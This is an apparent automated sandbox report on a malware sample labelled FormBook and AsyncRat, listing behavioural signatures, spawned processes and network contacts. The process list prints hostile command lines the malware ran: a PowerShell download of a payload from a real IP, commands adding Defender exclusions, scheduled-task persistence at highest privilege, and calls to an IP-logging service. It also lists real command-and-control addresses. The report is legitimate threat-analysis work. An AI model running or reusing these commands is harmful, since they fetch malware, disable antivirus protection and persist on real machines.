Analysis Overview
SHA256
69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Threat Level: Known bad
The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks computer location settings
Uses the VBS compiler for execution
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Writes to the Master Boot Record (MBR)
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Script User-Agent
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-01 15:32
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 15:32
Reported
2024-06-01 15:33
Platform
win10v2004-20240508-en
Max time kernel
43s
Max time network
34s
Command Line
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4124,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-01 15:32
Reported
2024-06-01 15:33
Platform
win10v2004-20240426-en
Max time kernel
46s
Max time network
35s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Пароли Chrome.csv"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
Files
memory/5064-0-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-1-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-2-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-3-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-4-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-5-0x00007FFB50FAD000-0x00007FFB50FAE000-memory.dmp
memory/5064-6-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-9-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-7-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-8-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-12-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-13-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-15-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-14-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-16-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-11-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-10-0x00007FFB0EF30000-0x00007FFB0EF40000-memory.dmp
memory/5064-17-0x00007FFB0EF30000-0x00007FFB0EF40000-memory.dmp
memory/5064-18-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-35-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 15:32
Reported
2024-06-01 15:33
Platform
win10v2004-20240426-en
Max time kernel
41s
Max time network
47s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\55.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\munqk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\17.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\network.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\maikati.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty\putty.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Uses the VBS compiler for execution
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3200 set thread context of 2804 | N/A | C:\Users\Admin\AppData\Local\Temp\a\3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 4832 set thread context of 3148 | N/A | C:\Users\Admin\AppData\Local\Temp\a\network.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4732 set thread context of 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\network.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\munqk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\17.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\network.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\maikati.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
C:\Users\Admin\AppData\Local\Temp\a\55.exe
"C:\Users\Admin\AppData\Local\Temp\a\55.exe"
C:\Users\Admin\AppData\Local\Temp\a\3.exe
"C:\Users\Admin\AppData\Local\Temp\a\3.exe"
C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
"C:\Users\Admin\AppData\Local\Temp\a\munqk.exe"
C:\Users\Admin\AppData\Local\Temp\a\17.exe
"C:\Users\Admin\AppData\Local\Temp\a\17.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\'
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2804 -ip 2804
C:\Users\Admin\AppData\Local\Temp\a\network.exe
"C:\Users\Admin\AppData\Local\Temp\a\network.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12
C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
"C:\Users\Admin\AppData\Local\Temp\a\maikati.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
-arguments
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4832 -ip 4832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 612
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"
C:\Users\Admin\AppData\Local\Temp\a\New.exe
"C:\Users\Admin\AppData\Local\Temp\a\New.exe"
C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ff8520346f8,0x7ff852034708,0x7ff852034718
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| CN | 124.71.81.174:80 | tcp | |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.130.223.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| N/A | 192.168.1.2:1800 | tcp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:2404 | tcp | |
| N/A | 127.0.0.1:2404 | tcp | |
| N/A | 127.0.0.1:2404 | tcp | |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | 118.194.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| MD | 94.103.188.126:80 | 94.103.188.126 | tcp |
| US | 8.8.8.8:53 | 172.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.188.103.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | softcatalog.ru | udp |
| RU | 88.212.252.98:443 | softcatalog.ru | tcp |
| US | 8.8.8.8:53 | 98.252.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| N/A | 127.0.0.1:2404 | tcp | |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 8.8.8.8:53 | 29.42.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.174.76.54.in-addr.arpa | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| SG | 118.194.235.187:50500 | tcp | |
| US | 8.8.8.8:53 | 57.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.108.192.104.in-addr.arpa | udp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 18.165.158.188:80 | sd.p.360safe.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 187.235.194.118.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.158.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
